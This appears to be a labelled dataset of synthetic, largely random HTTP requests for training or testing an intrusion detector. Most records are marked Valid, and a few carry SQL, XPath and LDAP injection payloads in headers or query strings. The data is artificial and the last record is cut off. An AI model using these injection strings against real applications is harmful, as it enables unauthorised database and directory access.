Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 183 155.105.82.2 "rsureli4" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 0274722
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21106
Start - Id: 29432
class: Valid
GET /sat4et/tlxnp/t7YgJMmoBQH.jpeg?ehaaIapFiodfw=787336&lMlte6ststroseU=he1tetaycHldET&@W-se7ewmd4=1&zswh=20198&spyxdFro2=+jcr3gh9nw&execVmscriptf@=biid&i9l0=gW-QLanxykj&ndbOnamrhen=2li&emeuceh=3c&sl=rtue3soh&3h_5exec=Mr&tpawtegnde=919 HTTP/1.1
Host: www.ummue.be
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-15;q=0.3
Accept-Encoding: compress
Accept-Language: *;q=0.0
Cache-Control: tjebl=4
Client-ip: 161.223.155.29
Cookie: nd=ureplaceEida2e);iderstt5thtwt=pegroup byocn;rTnm=59838096;emeH=aoptw&betweentitw7 1;ebcecste=F dm5og
Cookie2: $Version="1"
Date: Mon, 23 Apr 07 23:53:20 GMT
ETag: "NQ_ww-7a3NMMeGHVHC"
Expect: e4skeya=nemhrRk;zegybsow
From: suaPf@niebaoeya.org
If-Modified-Since: Sun, 11 Oct 09 24:18:47 GMT
If-Unmodified-Since: Fri, 09 Apr 10 23:57:47 UTC
If-Match: "UEpnljU..Bx5rp6X"
If-None-Match: *
If-Range: Sat, 24 May 08 20:03:48 GMT
Max-Forwards: 056
MIME-Version: 6.5
Pragma: if4ao9iy=tdltoic
Proxy-Authorization: Basic cm9zbjRkcDpyczM3c2FoZQ==
Authorization: Digest response="fFB9D3bde0Db6f4D2A3D76bA55B0bB2E"
Range: 2-278,82-815
Referer: http://uPgzf.cz/tdesniup.mpeg
TE: deflate;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 3.2; Mw-6b; rv:7.2.7) Gecko/04259944
UA-CPU: PowerPC
UA-Disp: 2709,267,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7858x401
Via: 3.3 160.132.178.123, 7.3 www.Bl7Twi.js
Transfer-Encoding: 8aonc; hnoyer=wrian1ey
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 754248
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29432
Start - Id: 3021
class: Valid
GET /a-ESFZnljCHJU/ckwaiqtoinNte2/oO3xoRyP_@Ri0fYh.shtml?elvoey=+hvbscriptOgprocessing-instructionn3oy+j%2F%26&ewtaoe=34283564&add2ab9rrwcs1=ahunprfOhtpassfsdsay&rhEia=osdt&31yform1HZF_O4=2%28oqg+ewneeL HTTP/1.1
Host: www.eolm6.cz:9
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-greek;q=0.7, x-mac-icelandic, iso-8859-15;q=0.2
Accept-Encoding: gzip, compress;q=0.0, deflate;q=0.1, gzip;q=0.0, deflate;q=0.7
Accept-Language: TETrd-tdgetu;q=0.3, g-i;q=0.4, o-i;q=0.6, ahadega2-eeCtu;q=0.3
Cache-Control: max-stale
Client-ip: 109.15.123.3
Cookie: @L2objectsAejs@qP=qndf;jW47_Y5Zddiv=l\h&ao7 htLgrcath;sutreve8=SArbi;soo33timm=28
Cookie2: $Version="951"
Date: Thu, 07 Oct 04 09:40:01 GMT
ETag: "qUHkNbL-yPO3IxUA"
Expect: 100-continue
From: Gnrp@qqtreOp.fr
If-Modified-Since: Thu, 29 Nov 07 20:53:20 CET
If-Unmodified-Since: Sat, 08 Apr 06 17:15:49 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Mar 08 04:39:20 GMT
Max-Forwards: 07
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: iaasI fdsn=2omiDleT
Authorization: NTLM Y2VvOGpqbjJlMHVhd1R0bmVtcjBlaG9ldG5yb3JhRXl0cmlhb2xzZXNkdA==
Range: 37991-,-13
Referer: /bnOn5d/ye0hL/TIlte/rh08aI.nsf
TE: trailers,trailers,gzip
Trailer: Warning
User-Agent: idewuR1R http://www.nsZxe.ch
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 737x8655
Via: FTP/8.7 www.dsgiebns.css, 2.7 205.213.195.43:89418
Transfer-Encoding: identity
Upgrade: nenfhq/1.5, aiea/9.0, 8nTSn/3.7, sddt9/6.1
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 34.221.232.228
X-Serial-Number: 32933233721
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3021
Start - Id: 35075
class: SqlInjection
GET /tCO9QOF/Ea6VGPY6/eto/sOMuzTe9E/e6wt48kZo/soFovJqccg/heconthhsnfwh/2.7_w4/imnR_gTA53k_/ZhNW.aspx?ei=eorE&gutsnpegnpcdE=09812&5a9g5poosi=nbdasax&bkgeOypn4ua=wTl&89i9=1725380195&rmiyruc5stli=5qtnh1VFu HTTP/1.0
Host: www.eiuc7.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, gzip, identity, deflate, compress;q=0.3
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Date: Wed, 03 Nov 04 13:33:52 UTC
ETag: "8J.PtOrQ4ynhF_j5"
Expect: D4dntne
If-Modified-Since: Sat, 12 Sep 09 13:46:37 UTC
If-Unmodified-Since: Sun, 06 May 07 15:33:45 CET
If-Match: "RBdB..@j27N63IP3v"
If-Range: Sat, 27 May 06 14:23:34 UTC
Max-Forwards: 000
Authorization: Digest algorithm=MD5-sess
Referer: http://r5o7s.cz/hd1hh/szwda1ee.doc
User-Agent: 'UNIONALLSELECTfieldFROMaresllniWHERE''    = '
UA-CPU: MIPS
UA-Disp: 7830,290,16
UA-OS: Linux
Transfer-Encoding: identity
----: -----------------------------------------

null

End - Id: 35075
Start - Id: 22728
class: Valid
GET /eeei5i20a/iwtGoseonee7ips/B8oh4MtelnetXandB/@y2sF49bOPwwZ0d.png?iomqqea2lira=yodiigfia HTTP/1.0
Host: 239.24.215.226
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 180.53.52.110
Cookie: uFN.vIspV=re;ne0iaiam=nnsd;nnteqoipe=471
Cookie2: $Version="658"
Date: Fri, 19 Aug 05 23:30:26 UTC
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: nrnt=aatcre
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Tue, 02 Nov 04 15:08:06 CET
If-Unmodified-Since: Sat, 20 Jun 09 01:40:11 UTC
If-Match: "hUV56KmzpZ7ktZWoS"
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 2.1
Pragma: Nre=fTdrseDE
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: NTLM dVc3M2xvZXl5QWxlZDR0anRvZ2VnT25zbTduSUhvNGV0d2FiYXM=
Range: -59538
Referer: http://www.is8hiand.it/shwt/2nseh.nsf
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 1.9; bh-ot; rv:8.6.5) Gecko/31127283
UA-CPU: MIPS
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: 9.1 www.trun.jpeg:4690, 2.7 96.114.133.169, 5.7 238.81.86.61
Transfer-Encoding: deflate
Upgrade: iae1s/0.9, eeod/3.5, 8dteNe/9.2, nel/7.5, nNE/9.2
Warning: 405 www.hedts.tiff "9neamsw9eeTeirmfn" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22728
Start - Id: 29304
class: Valid
GET /iy/kZ2/sI6lIH/tsan6ug/leltw/hRhF/o_2p6t/jFjFzqrXNcRw1/l_xiQS.htm?UP@t76h=leoedeononeFQ8at8h&xt=26976&9tuseQ=tte+a%28oeroda&4efl=hnr+a&ttehhhs=98525783&ieqneggnny=88378&0Cggsxs=5o&OTexecj6Q@_=%25tT&a6gsiaede=7832705&v7hCuaott=UD6&hw8=oaaaooNlssI&.drA2=oejh&sSraeiwdi7neod=oAkx2b&a1areousteiur=h8u- HTTP/1.0
Host: www.emPhMusts.st
Connection: eewShwro
Accept: */*;q=0.9
Accept-Charset: windows-1253;q=0.1, iso-2022-jp, euc-tw, iso-8859-5, iso-8859-6
Accept-Encoding: gzip, identity;q=0.7
Accept-Language: *;q=0.0
Cache-Control: sns='eosra'
Client-ip: 189.125.66.35
Cookie: @dobjectxPG=lNn9uc7Ha;esT=tv;erf8n=5HRE
Cookie2: $Version="18"
Date: Sat, 04 Mar 06 24:48:23 CET
ETag: W/"qojpx4TVUCNnbZ23in_"
Expect: 100-continue
From: yttt5iy@rcto.com
If-Modified-Since: Sun, 08 Apr 07 21:36:32 GMT
If-Unmodified-Since: Sat, 23 Apr 05 10:31:49 CET
If-Match: "884.FwXpzmk4G04U7Y"
If-None-Match: *
If-Range: Tue, 01 Aug 06 18:26:32 GMT
Max-Forwards: 96
MIME-Version: 0.7
Pragma: wS2p='s2nzimb'
Proxy-Authorization: Basic ZXlkYXdpRjpzaW5wYW1v
Authorization: Basic ZWFoYWRpOmVlYnV3Y3A=
Range: -1680
Referer: http://efilbf.ch/i6nrteb/tcyas.gif
TE: deflate,trailers
Trailer: Max-Forwards
User-Agent: dpz1nwcas (ifTJ.W; lH_7ClI2N)
UA-CPU: MIPS
UA-Disp: 640,917,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8762x9260
Via: FTP/3.8 169.160.244.230, HTTP/9.0 www.tueorhd8.gif
Transfer-Encoding: gzip
Upgrade: n1tlH/0.1, Iwotm/0.8, 4mr/3.8, entnl/4.8
Warning: 708 www.opmsnet.html "atmareba0" "Wed, 30 May 07 20:29:06 CET"
X-Forwarded-For: 63.57.100.153
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29304
Start - Id: 49393
class: XPathInjection
GET /hltSel9isw/irnsi9to9qsM/Elabdhrt/W.3tCUJ/Iena/iedrwm/aws/tTKtDjK1qJZWfiBvajO/ita04sgbetie/acIzo5o/m5SDmIXVtb.8M-/nJTZWMuVI.gif?ishtyacT5a=18678177&ylq8h=5&getrdo=famaane7erdao&skeartr=e0&ne00ieie=3526&BtnphfuseeiE=sMYMwR&myrx=327118&3QallgZN.S-P=%25%7E&stC8=a%27+stdinuEt&ddtgahi=2745889669&oobtsIteweou1n=c&esieagh6lr=5373805782&rdrligrEosca=1118++++or++u7syFi%2Fue%2Fea4%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D++++or++2460%3D HTTP/1.0
Host: 201.246.242.190:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.6, identity
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 232.182.22.65
Cookie: whereQd2nR-Zy=121153
Cookie2: $Version="461"
Date: Sun, 18 Jul 04 03:08:05 UTC
ETag: W/"2TMjTj3nMjRhbDH037L"
Expect: Mt3seamr
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Fri, 14 Jul 06 16:04:38 UTC
If-Unmodified-Since: Sat, 15 Aug 09 22:58:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3237
MIME-Version: 6.2
Pragma: l9e=ritgonhs
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: Digest algorithm=MD5-sess
Range: 67912-847396,-254666,29-
Referer: /emaoeymi/geRatk.jsp
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/1.4 (compatible; Konqueror/0.4; Linux i386; otllNH; snvaol)
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6489x8625
Via: FTP/9.7 18.193.169.245, 9.0 www.Bhew6.tiff:250
Transfer-Encoding: t5jnee
Upgrade: goiteB/8.3
Warning: 199 www.s2an.css "moeybagoex" "Sat, 23 May 09 04:00:06 UTC"
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 9327975536472
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49393
Start - Id: 38628
class: LdapInjection
GET /yRdp/chhdct/sN-ozC.iCVDKGZ_6.tiff?oeeelfe=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: 15.163.81.157:37
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-4, hz-gb-2312, gb2312, euc-tw, windows-1254;q=0.8
Accept-Encoding: gzip, identity;q=0.6, compress;q=0.7, identity;q=0.9, compress;q=0.6
Accept-Language: *;q=0.6
Cache-Control: 1suf8ie=7cbtsm
Client-ip: 64.108.85.141
Cookie: ndu=58976;iecw25z=8296253953;latCL6mY-=630;iRvdeiNuuaej=9863;hbltCgBedOYDTeu=eVjqHmc6T
Cookie2: $Version="1"
Date: Sat, 15 Jan 05 19:33:10 CET
ETag: "drR02HaOX9i1.LlpNbB"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Fri, 18 Feb 05 03:24:27 CET
If-Unmodified-Since: Fri, 25 Nov 05 11:42:33 GMT
If-Match: *
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.5
Pragma: 7Efe=howfmdo
Proxy-Authorization: Digest cnonce="uda3ny"
Authorization: NTLM N2Fyc2EzaWFEaW42aVNjY3J2NG9nYXJiaWZ0bDRyZjlzbnpXYmVud09haQ==
Range: 28174-,-1
Referer: /tnn6cn/h8reedo/sxyMssa/slme7.css
TE: gzip;q=0.8
Trailer: Accept
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 4.4; ea-l0; rv:4.1.4) Gecko/91553959
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: eAcchT/3.2 81.188.227.0
Transfer-Encoding: identity
Upgrade: hiaeAa/4.4, r8ta/3.6, rte3z/8.6, iadrea/0.5, ia5gs/1.7
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 126.96.147.176
X-Serial-Number: 325446948
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38628
Start - Id: 31266
class: Valid
GET /oe/baibQtnoeCzexo/aDrUs/ire/rn5h/msleeio5.shtml?tbbem4saihe=dn70g&ktwi7slOlese=a8ptnTlml&iticeIe=7rbso8oAooec1&nsotnSO=apaxr HTTP/1.0
Host: 165.83.242.34
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-8;q=0.4, iso-8859-1
Accept-Encoding: gzip
Accept-Language: eca-og;q=0.3
Cache-Control: no-transform
Client-ip: 200.93.24.149
Cookie: oeHeons6te=7027699;r-V_F49vbscript=tletuoe8e
Cookie2: $Version="0"
Date: Mon, 26 Dec 05 20:42:10 UTC
ETag: "iZpDt0NHgoX8qTEDjFL"
Expect: qddeh=sdiabmt;loHserrr
From: harutUle@4Tes.com
If-Modified-Since: Sat, 17 Nov 07 17:25:32 GMT
If-Unmodified-Since: Fri, 25 Jan 08 16:26:56 GMT
If-Match: "UdOx8r5vHFBPmpFg"
If-None-Match: "KIbvxxp63IdtC9wFB8"
If-Range: Thu, 02 Aug 07 19:14:11 UTC
Max-Forwards: 0
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: l4wi AeDLYae=otoo3HP3
Range: 019-,893-4434
Referer: http://cgithe.st/s3en/pat7/ahGdeP9t.exe
TE: gzip;q=0.1,gzip;q=0.9,trailers
Trailer: From
User-Agent: d5sonbxi/6.2.7.2
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3795x126
Via: FTP/2.0 www.rnYoIl.html
Transfer-Encoding: compress
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 160 www.s6Dl4nG.js:02 "wyNAeNlmsnn6" 
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 173088240
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31266
Start - Id: 13247
class: Valid
GET /5U1iPZjS-/esuqyDnzeee4iTa/ePq9He@/iLbiqz_KRMjSCdbdiRm/rdi/bp3wv1q8PR/sprbkk5ud.tiff?cehU0te8o=xgroup+byct5%22k0%22%25uIsrcpe1%5Dr&sam8TSpassthru=89870083&rcvderau=%3EleFips1%5BdIi%28eptelnet&a9zxOstdinT=4371101518&1haI=ozetTm8i&-A4@qSbin=nd&ieet=%29a+e&KTTgQkS8=sD%2B&a3s2roi=uihohn&dthCtmrae=qaliHimtt&MBvstyle6rh=470943 HTTP/1.1
Host: 216.233.136.98:44
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp, gb2312;q=0.7, euc-kr
Accept-Encoding: deflate;q=0.8, deflate;q=0.2
Accept-Language: bgne-xsca3do;q=0.3, ohK-a
Cache-Control: no-cache
Client-ip: 222.47.254.86
Cookie: etxonekiirlnr=Tfx L
Cookie2: $Version="9"
Date: Tue, 18 Dec 07 08:12:32 UTC
ETag: "7_eABaFBChlv0@H"
Expect: 100-continue
From: berlo@UooOhol.cz
If-Modified-Since: Sat, 22 Oct 05 12:33:37 CET
If-Unmodified-Since: Thu, 09 Feb 06 24:59:25 GMT
If-Match: *
If-None-Match: *
If-Range: "_n5W6lV9YRi3DmzU"
Max-Forwards: 7
MIME-Version: 2.8
Pragma: dcdn8th3='HhHxeho'
Proxy-Authorization: Ooasqs dwno=ntjiba
Authorization: NTLM aWR2dGludGZlZWkzaWl3bzdtdGhzYWhpT2FhcmI5ZHRib2l5dXRzdA==
Range: 16-5
Referer: /teltea2a/hsIxwch/6otgl.jsp
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 4.8; sr-4n; rv:8.8.5) Gecko/20065683
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: gzip
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 198 157.148.141.227 "pngahiabduinT" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13247
Start - Id: 13719
class: Valid
GET /tfvt8gYVE247I/twbhe2TeacodReg/nuV/egmiCru8bvsa8VvtT/ExMrcpj6oQHSKlike/v92@JMT_r7q/edNWTLPauXDetwG/iqFhiZf-bobFXd.css?riwger3WnAa=rBTNX&rvrt=%5B%27fednith&gt24syeycEc=558905045&lowa9tqei5=39636751&5o8lTta6Toibaw=0 HTTP/1.1
Host: www.ihne.cz
Connection: keep-alive
Accept: video/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: do-a;q=0.6, redad-lh;q=0.4
Cache-Control: no-transform
Client-ip: 45.131.91.10
Cookie: tte=baorird;1taprp0naZuihl=likeeJtn4m0nln;ehbg2yt=gtf;rKsinialmhs3arf=248;hphFFeqli=da0d oI bcdlogngrnNndy
Cookie2: $Version="4"
Date: Thu, 29 Oct 09 15:02:10 GMT
ETag: W/"a_ZfpksVbF0IZ4QA"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Tue, 14 Sep 04 04:46:13 GMT
If-Unmodified-Since: Sun, 18 Apr 04 15:55:00 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 18 May 09 15:58:22 CET
Max-Forwards: 97
MIME-Version: 2.5
Pragma: Dho=thng3c4
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: NTLM dGRib2d2bXNyOEJ4ZWRGNmNhZXR2YWJiUmVydGdobG4=
Range: 946087-
Referer: http://eDoAj.ch/aahuf.pdf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: hs.LVg- http://www.p0ne.uk
UA-CPU: PowerPC
UA-Disp: 911,125,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8977x4193
Via: FTP/6.8 www.paststr.html
Transfer-Encoding: identity
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 166 55.10.78.191 "aedstaedriNMcf474i" "Thu, 17 Mar 05 05:00:13 GMT"
X-Forwarded-For: 19.232.169.41
X-Serial-Number: 1852790108043394492
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13719
Start - Id: 17874
class: Valid
GET /ewduejZvWFlUCcd/dyesvrss/iySpv4eeiu4/oae2elKleuueE/uAjmrer/0deadb1/eyzsumCQ36WWTvN/mqvqfNMqYHe9aQ-6.dll?i6irr88i=60006308 HTTP/1.0
Host: 149.214.220.227:777
Connection: 7pGne
Accept: image/*, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: o2aco=yyvtNS
Client-ip: 78.14.160.119
Cookie: 8B2pQS9=thlui;maslzhaoic=430352;w3osm6snmdheOK=62989;sUiariicen2f=iscaoka0nullrma;2is9=yr%;uiu=2853668
Cookie2: $Version="47"
Date: Tue, 04 Dec 07 13:14:13 GMT
ETag: "uXPXcexxgKdrDYnufxs"
Expect: anaiO
From: sd5ne@iqufsnt5.org
If-Modified-Since: Thu, 08 Feb 07 20:23:56 GMT
If-Unmodified-Since: Wed, 11 Jan 06 21:06:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Dec 06 03:09:01 UTC
Max-Forwards: 0656
MIME-Version: 8.8
Pragma: eaOdheec='ml'
Proxy-Authorization: NTLM aWd1bXRkZWR2eW5hc3ptdG5odHVaUmhoczJBbGR0ZGxF
Authorization: Basic OXlzMGRjOmFuYW9laWU=
Range: 0553-412,892-528226
Referer: /Nhswe1.dll
TE: deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: n7ortc2tt/8.8.3.2
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8176x316
Via: tme/6.0 www.AAmysieh.shtml, HTTP/2.5 98.128.199.64, nrx/2.6 51.192.192.211
Transfer-Encoding: oMc45t
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 182 45.71.47.57 "htrzocTenleelhEw" "Wed, 18 Oct 06 09:52:04 GMT"
X-Forwarded-For: 233.30.107.188
X-Serial-Number: 3494344
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17874
Start - Id: 13756
class: Valid
GET /u6DzR87eb4eIeNnRwuS/u0thuQqK/e1OB/oftDIy/EyilYSU4yU/Saq/ecJblDeiC@/0JxxbHAbV1lb86KT88w/glioeRpdMphhtepCrmet/1.GoxI/sb.tiff? HTTP/1.1
Host: 43.138.19.125:54
Connection: rUtyey
Accept: audio/*;q=0.0
Accept-Charset: utf-8;q=0.7, cp-950;q=0.9, cp-932, x-mac-ce
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 58.102.229.56
Cookie: Lttco=846;Fai4fabc0ahiked=ur;6sa=pscin;OKWUQkpdwhereC=4905;oyfeon7c=tHtPAf;shidEy=774486383
Cookie2: $Version="9"
Date: Sun, 21 May 06 06:28:42 UTC
ETag: "vDGVu79jEDu_3Ih"
Expect: 100-continue
From: gnhB9o@rfci.com
If-Modified-Since: Sat, 10 Mar 07 20:32:06 UTC
If-Unmodified-Since: Sat, 26 Mar 05 11:27:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 17 Apr 09 11:36:38 CET
Max-Forwards: 53
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWk2NWE0YTpzdG9tZTJodA==
Authorization: Basic c0hSYTpoaWZs
Range: 11-,904144-8
Referer: /ri0qSR/iaurrNtd.txt
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: oR8teeteaohpqtn1xlo
UA-CPU: PowerPC
UA-Disp: 173,9492,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x597
Via: esrho/2.8 107.196.37.132:0
Transfer-Encoding: deflate
Upgrade: 4tkn/9.7, fa3eis/5.5
Warning: 820 www.uproeo.htm "Ianeee" 
X-Forwarded-For: 60.68.206.39
X-Serial-Number: 26172268
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13756
Start - Id: 28892
class: Valid
GET /dn6sooeyeoCn/snyBla9eFc60XTga/gnQoCNAa.IWbze/AZlAVUGJGW/wctg8VY/q.RdojbRsX/txOV09SMjD.exe?wn=erx%40HxuH7-H7&h1st=112&R_0XspEevalMgYL=60538&aqnbzlcl0=+uboh&joa0a=qV0CQx&l5vrsFehmduidr=1875 HTTP/1.1
Host: 254.248.8.151
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale=031
Client-ip: 43.22.120.250
Cookie: u83usrtr=593924;8t=92;irl=n:avS ;hzeAl=hgieiW;connectWQ5c.l9KwNw=Astding;0iunriocx7=h
Cookie2: $Version="9"
Date: Wed, 21 Jan 09 18:23:36 UTC
ETag: "2DjujeEkOAeoLe7@"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Thu, 21 Jul 05 04:17:03 GMT
If-Unmodified-Since: Mon, 19 Apr 04 08:28:36 CET
If-Match: "GWBg8L7Rru6E9VbUlOnb"
If-None-Match: "dgWJ8McAp0y4mx0"
If-Range: Thu, 19 Aug 04 15:46:51 UTC
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: STsh gaeltfy=aI5t
Range: 8-,63-0,365419-
Referer: http://www.utirYjo.net/lBehni/0ufee/0sdabmb7/taAetpa.ace
TE: deflate,chunked,chunked;q=0.7
Trailer: If-None-Match
User-Agent: set2ayejd0/9.5.2.2.2
UA-CPU: MIPS
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 122x5513
Via: 2.6 9.97.32.7, rcys/2.2 146.91.150.243, HTTP/5.7 74.209.74.51:0
Transfer-Encoding: identity
Upgrade: sippk/3.0, sieesd/6.3, eUhlW/5.4, r57ml/6.9, oriie/9.1
Warning: 104 www.oaChe2ao.css "si2kaalcoktaehr" "Sun, 05 Aug 07 09:32:59 GMT"
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 926912300576004465
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28892
Start - Id: 7072
class: Valid
PUT /b_RZ4_DUrcv6/fthsYcein0WriTioui/r6cTuDZAZ/o.CVZ5-w4LqAx.js? HTTP/1.1
Content-Length: 73
Content-Language: ohaentte
Content-Encoding: compress
Content-Location: http://sbhsamo.com/cied3Cpr/mclfe/irsa.png
Content-MD5: dG5tdHR0amdVZWVzZ21ydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Feb 04 07:33:44 GMT
Last-Modified: Sun, 28 Sep 08 22:35:50 UTC
Host: 156.60.150.217
Connection: close
Accept: */*
Accept-Charset: cp-932;q=0.8, euc-jp;q=0.3, cp-950
Accept-Encoding: compress, compress;q=0.5, gzip, identity
Accept-Language: nfrhor4-eab;q=0.4
Cache-Control: sljdRs=oel
Client-ip: 133.103.82.179
Cookie: bgsounddOaopenjd3sMy4=36661
Cookie2: $Version="672"
Date: Tue, 18 Apr 06 21:38:13 CET
ETag: W/"ZK7Y4he@iaf_mrz9c"
Expect: PaHiyuo
From: dsgletSd@lzsej.ch
If-Modified-Since: Thu, 17 Sep 09 20:17:42 UTC
If-Unmodified-Since: Wed, 02 Feb 05 07:32:52 CET
If-Match: "irwUU@TBN@oaS6Bm2"
If-None-Match: *
If-Range: "p_oLq2x-OcXzu2kXsK"
Max-Forwards: 07
MIME-Version: 2.7
Pragma: ehrL='snr'
Proxy-Authorization: NTLM WmExdG5ldGF0ZG50c2lsOWF5Y2lpc2VyYndmZXRoNDFvYg==
Authorization: Digest username="eudhd"
Range: 51061-93,46103-3,-27
Referer: http://www.o6ehR5.net/n8dwh/iou4m/ofea.wav
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.3 (Windows; U; WinNT 9.4; tg-mC; rv:8.0.8) Gecko/24945244
UA-CPU: x86
UA-Disp: 4109,8794,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6819x838
Via: 4.7 225.142.99.72:903, 7.0 69.137.45.207
Transfer-Encoding: pRBw8s
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 300 www.4aei.js "Ajhoehebly" "Tue, 03 Nov 09 18:37:06 CET"
X-Forwarded-For: 6.110.131.156
